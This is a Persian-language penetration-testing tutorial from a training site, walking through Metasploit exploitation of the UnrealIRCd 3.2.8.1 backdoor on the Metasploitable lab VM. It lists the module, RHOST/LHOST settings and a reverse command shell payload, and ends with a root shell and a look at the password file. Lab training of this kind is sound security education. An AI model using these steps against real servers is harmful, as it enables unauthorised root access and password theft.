تا %60 تخفیف خرید برای 7 نفر با صدور مدرک فقط تا
00 00 00
در توسینسو تدریس کنید

آموزش Metasploitable و نفوذ به سیستم عامل آسیب پذیر قسمت 3

در قسمت پیش از آموزش نفوذ به سیستم عامل Metasploitable، نحوه اسکن کردن این سیستم عامل را از طریق کالی و بصورت ریموت (از راه دور) توضیح دادیم. در این بخش نیز در ادامه صحبت های پیشین قصد داریم تا به exploit کردن سرویس Unreal IRC بپردازیم.در مورد این سرویس بصورت مختصر در قسمت پیش توضیح دادیم و پیشنهاد میکنیم برای شروع این بخش ابتدا به مطالعه قسمت پیش بپردازید. با ما همراه باشید:

برای شروع کار ابتدا Metasploit را اجرا میکنیم:

root@kali:~#msfconsole

حالا از دستور "search" استفاده کرده و در قسمت "نام سرویس" و "نسخه برنامه" جایگذاری میکنیم:

Msf> search Unreal 3.2.8.1

اجرای این دستور، نتیجه زیر را برمیگرداند:

وب سایت توسینسو

یک بکدور Unreal 3.2.8.1 با قابلیت اطمینان "excellent"! بد نیست بدانید که Exploit ها بر اساس درصد موفقیت و ماندگاری شان رتبه بندی میشوند.اگر تعریف Metasploit را به یاد داشته باشید، میدانید که راه های مختلفی برای بهره برداری (Exploit) از یک آسیب پذیری وجود دارد:

  • انتخاب یک Exploit
  • تنظیم آپشن های Exploit
  • انتخاب یک payload
  • تنظیم اپشن های payload
  • اجرای Exploit
  • برقراری ارتباط با سیستم ریموت

حال میخواهیم طبق این دستور العمل سناریو خود را پیش ببریم.

انتخاب یک Exploit

اگر از دستور "info" استفاده کنیم، میتوانیم کمی بیشتر در مورد Exploit احتمالیمان اطلاعات کسب کنیم.

Msf > info exploit/unix/irc/unreal_ircd_3281_backdoor

با اجرای این دستور، توضیحات زیر بما برگردانده میشود:

  • این ماژول از یک بکدور ناخواسته که در آرشیو دانلود Unreal IRCD 3.2.8.1 اضافه شده است، سوء استفاده میکند. این بکدور در آرشیو Unreal3.2.8.1.tar.gz و بین تاریخ نوامبر 2009 تا 12 ژوئن 2010 موجود است. ""

ادامه میدهیم : میخواهیم از Exploit مورد نظرمان استفاده کنیم. پس فرمان زیر را وارد کرده و آپشن های آن را چک میکنیم:

 Use exploit/unix/irc/unreal_ircd_3281_backdoor 
وب سایت توسینسو

همانطور که میبینید، آپشن های زیادی برای تنظیم وجود ندارد. فقط کافیست که آدرس Host مقصد را وارد کنیم:

Set RHOST 192.168.198.145

که در اینجا 192.168.198.145، ادرس Metasploitable است.

انتخاب یک payload

حالا نیاز داریم تا یک payload را انتخاب کنیم. برای این منظور تایپ میکنیم : "show payloads" تا تمام payload هایی که با Exploit مورد نظر ما سازگار هستند، نمایش داده شوند:

وب سایت توسینسو

متاسفانه تمام آن ها از نوع شل های دستوری (command shell) هستند. خوب همانطور که قبلا هم بشما آموزش دادیم، یک Meterpreter shell ذاتا بهتر از یک شل دستوری یا command shell است؛ اما در این مورد خاص چاره ای نداریم بجز آن که یکی از شل های دستوری را انتخاب کنیم. از generic reverse shell استفاده میکنیم. این شل پس از اتمام Exploit، دقیقا ما را درون یک terminal shell در سیستم هدف قرار میدهد. حالا باید عبارت زیر را تایپ کنید:

Set payload cmd/unix/reverse

و سپس :

Show options
وب سایت توسینسو

تنظیم آپشن های payload

برای این payload آن چیزی که احتیاج داریم اینست که دستور "LHOST" را تنظیم کرده (آدرس IP سیستم کالی) و سپس مجددا برای اطمینان از صحت انجام کارها دستور "show options" را وارد کنیم:

وب سایت توسینسو

مقادیر RHOST (سیستم مقصد) و LHOST (سیستم کالی) بدرستی جایگذاری شده اند. همه چیز در نقطه اوج خودش قرار دارد و در نهایت برای رسیدن به هدفمان باید دستور "exploit" را صادر کنیم:

وب سایت توسینسو

بیاد داشته باشید که نهایت کاری که با اجرای این دستور برای شما انجام شده است، باز شدن یک session است و بعد از آن یک کرسر چشمک زن انتظار اقدام بعدی شما را میکشد.شما در سیستم هدف و در یک Terminal shell قرار دارید!

وب سایت توسینسو

همانطور که میبینید، ما عبارت "whoami" را تایپ کردیم و سیستم بلافاصله با کلمه "root" به استقبال ما آمد. شناسه کاربری root بالاترین دسترسی و سطح را در یک سیستم لینوکسی دارد.پس همانطور که مشاهده کردید، exploit و payload ما کار میکند! این نکته را هم بگوییم که تمام دستورات استاندارد لینوکس در شل ی که ما داریم کار میکنند. برای مثال میتوانیم فایل پسورد را نشان دهیم:

وب سایت توسینسو

همانطور که دیدید، توانستیم با کرک کردن فایل پسورد ها، به پسوردهای واقعی دست پیدا کنیم. اما اگر برایتان گنگ بود، نگران نباشید. این کار را فقط برای تست انجام دادیم و در آموزش حملات پسورد بصورت کامل اینکار را برایتان شرح خواهیم داد.

سربلند و مانا باشید.

پایان

نویسنده: احسان امجدی

منبع: انجمن تخصصی فناوری اطلاعات ایران

هرگونه نشر و کپی برداری بدون ذکر منبع و نام نویسنده دارای اشکال اخلاقی می باشد.

نظر شما
برای ارسال نظر باید وارد شوید.
1 نظر
افرادی که این مطلب را خواندند مطالب زیر را هم خوانده اند